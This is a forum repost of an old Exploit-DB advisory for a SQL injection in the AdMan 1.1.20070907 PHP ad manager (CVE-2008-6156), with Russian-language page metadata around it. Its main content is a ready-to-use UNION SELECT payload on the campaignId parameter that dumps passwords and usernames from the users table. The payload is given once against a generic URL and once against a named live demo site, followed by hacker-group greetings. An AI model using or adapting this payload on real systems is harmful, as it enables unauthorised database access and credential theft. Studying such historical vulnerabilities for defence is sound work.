Exploit AdMan 1.1.20070907 - 'campaignId' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6702
Проверка EDB
  1. Пройдено
Автор
SUB-ZERO
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6156
Дата публикации
2008-10-08
Код:
############### >>> Remote SQL Injection <<<  ###########
##    SuB-ZeRo(Walid)                                                              ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(algeria hackers)
 contact :  [email protected]
                
 
 buy script : http://www.formfields.com/adManArea/adManPricing.php
dork    : find it
 exploit:
 www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 L!Ve DeMo  :::
 http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
 NoTe:YoU must singup and login in web sit and you put your exploit
########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
>>> all muslims

# milw0rm.com [2008-10-08]
 
Источник
www.exploit-db.com